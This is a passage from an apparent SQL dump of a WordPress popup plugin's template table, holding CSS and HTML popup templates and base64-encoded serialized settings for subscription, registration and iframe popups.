1px 1px 1px #000;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell{\r\n    [if bg_type_3 == \'color\']\r\n  	background: [bg_color_3] 100%;\r\n  	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n    float: left;\r\n    width: 100%;\r\n    padding: 40px 0 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .logo-img{\r\n  	width:180px;\r\n  	height:180px;\r\n  	[if bg_type_2 == \'color\']\r\n	background: [bg_color_2]; \r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	position: absolute; \r\n    right: 0;\r\n}\r\n#ppsPopupShell_[ID] .text-block {\r\n    position: relative;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 65%;\r\n	text-align: left;\r\n	color: #f37362;\r\n    font-size: 23px;\r\n    line-height: 30px;\r\n    padding-left: 10px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 li{\r\n	font-size: 18px;\r\n    color: #629296;\r\n    line-height: 26px;\r\n    display: inline-block;\r\n    padding-left: 25px;\r\n    margin-bottom: 16px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n    display: inline-block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg{\r\n	clear: both;\r\n  	text-align: center;\r\n}','Photodoto.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',24,0),(31,'Map style',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6OTI6e3M6NToid2lkdGgiO3M6MzoiNjcwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo0OiJub25lIjtzOjg6ImJnX2ltZ18wIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjMjMyMzIzIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiI2Q4NTExYyI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiNmZmZmZmYiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czoxMDoiZm9udF90eHRfMSI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMSI7czo3OiIjMDAwMDAwIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjNTg1ODU4IjtzOjE1OiJyZXNwb25zaXZlX21vZGUiO3M6MzoiZGVmIjtzOjE3OiJyZWlkcmVjdF9vbl9jbG9zZSI7czowOiIiO3M6OToiY2xvc2VfYnRuIjtzOjExOiJ3aGlsZV9jbG9zZSI7czo3OiJidWxsZXRzIjtzOjExOiJsaXN0c19ncmVlbiI7czoxMToibGF5ZXJlZF9wb3MiO3M6MzoidG9wIjtzOjk6ImVuYl9sYWJlbCI7czoxOiIxIjtzOjU6ImxhYmVsIjtzOjIzOiJTVUJTQ1JJQkUgVE8gTkVXU0xFVFRFUiI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MDoiIjtzOjY6ImVuYl9zbSI7czoxOiIxIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTY6InN1Yl9ncl9jeWNsZV9kYXkiO3M6MToiMCI7czoxMzoic3ViX2ljX2FwcF9pZCI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfdXNlciI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfcGFzcyI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMzoic3ViX3NmX2FwcF9pZCI7czowOiIiO3M6MTQ6InN1Yl9ja19hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX21lbV9hY2NfaWQiO3M6MDoiIjtzOjE1OiJzdWJfbWVtX3B1ZF9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfbWVtX3ByaXZfa2V5IjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLXVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo4OiJsb2dpbl9ieSI7czo4OiJ1c2VybmFtZSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjIzOiJyZWdfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxMzoicmVnX2J0bl9sYWJlbCI7czo4OiJSZWdpc3RlciI7czoxMDoicmVnX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czoyNzoiVGhhbmsgeW91IGZvciByZWdpc3RyYXRpb24hIjtzOjIxOiJyZWdfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InJlZ19yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6MzM6IjxwPltnb29nbGVfbWFwX2Vhc3kgaWQ9XCIxXCJdPC9wPiI7czo1OiJ0eHRfMSI7czo1OToiPHA+W2NvbnRhY3QtZm9ybS03IGlkPVwiMjA4XCIgdGl0bGU9XCJDb250YWN0IGZvcm0gMVwiXTwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjIiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMiI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		[if enb_txt_0]\r\n			[txt_0]\r\n		[endif]\r\n		<div class=\"right ppsSubscribeShell\">\r\n			[if enb_subscribe]\r\n				[sub_form_start]\r\n				[sub_fields_html]\r\n				<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n				[sub_form_end]\r\n			[endif]\r\n			[if enb_txt_1]\r\n				<div class=\"another-contact-form\">\r\n				[txt_1]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	position:relative;\r\n}\r\n#ppsPopupShell_[ID] .right{\r\n	position: absolute;\r\n    bottom: 15px;\r\n    right: 15px;\r\n}\r\n#ppsPopupShell_[ID] .another-contact-form{\r\n    background-color: rgba(0, 0, 0, 0.5);\r\n    width: 100%;\r\n    padding: 10px;\r\n    box-sizing: border-box;\r\n}\r\n#ppsPopupShell_[ID] p {\r\n    margin: 0 0 5px;\r\n}\r\n#ppsPopupShell_[ID] .wpcf7-form .col-sm-8{\r\n	text-align:center;\r\n}\r\n#ppsPopupShell_[ID] .wpcf7-form label{\r\n  text-shadow: 1px 1px 2px white, 0 0 1em white;\r\n}\r\n#ppsPopupShell_[ID] .wpcf7-form  div.wpcf7-validation-errors {\r\n    border: 2px solid #F70000;\r\n    background-color: rgba(255, 254, 254, 0.5);\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n    top: -5px !important;\r\n    right: -5px !important;\r\n    z-index: 666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsErrorMsg,\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	background-color: #333;\r\n  	padding: 5px 10px;\r\n  	border-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	margin-right: 5px;\r\n  	height: 40px;\r\n  	border: 1px solid #d1b36d;\r\n  	width: auto;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -5px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n  	[if bg_type_1 == \'color\']\r\n  	background-color: [bg_color_1];\r\n  	background-image: none;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 2px 2px 2px #000;\r\n  	cursor: pointer;\r\n  	line-height: 1px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}','mapstyle.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',27,0),(32,'Simple iFrame',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjI6IjEwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6ODoiY2xvc2Vfb24iO3M6MTA6InVzZXJfY2xvc2UiO3M6MjU6ImNsb3NlX29uX2FmdGVyX3RpbWVfdmFsdWUiO3M6MToiNSI7czoxMDoic2hvd19wYWdlcyI7czozOiJhbGwiO3M6MTQ6InNob3dfdGltZV9mcm9tIjtzOjc6IjEyOjAwYW0iO3M6MTI6InNob3dfdGltZV90byI7czo3OiIxMjowMGFtIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjMwOntzOjEwOiJpZnJhbWVfdXJsIjtzOjI2OiJodHRwczovL3d3dy53aWtpcGVkaWEub3JnLyI7czo1OiJ3aWR0aCI7czozOiI0MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6NjoiaGVpZ2h0IjtzOjM6IjMwMCI7czoxNDoiaGVpZ2h0X21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18wIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjNDI0MjQyIjtzOjk6ImNsb3NlX2J0biI7czoxNToiZXhjbHVzaXZlX2Nsb3NlIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6ODoiYW5pbV9rZXkiO3M6MTA6ImZhZGVfcmlnaHQiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MzoiNTAwIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6MDoiIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6MDoiIjtzOjEwOiJyZWdfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJyZWdfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToicmVnX3R4dF9zdWNjZXNzIjtzOjI3OiJUaGFuayB5b3UgZm9yIHJlZ2lzdHJhdGlvbiEiO3M6MjE6InJlZ190eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSByZWdpc3RyYXRpb24gb24gW3NpdGVuYW1lXSI7czoyNToicmVnX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk2OiJZb3UgcmVnaXN0ZXJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciByZWdpc3RyYXRpb24uIElmIHlvdSBkaWQgbm90IHJlZ2lzdGVyIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MTM6InJlZ19uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJyZWdfbmV3X21lc3NhZ2UiO3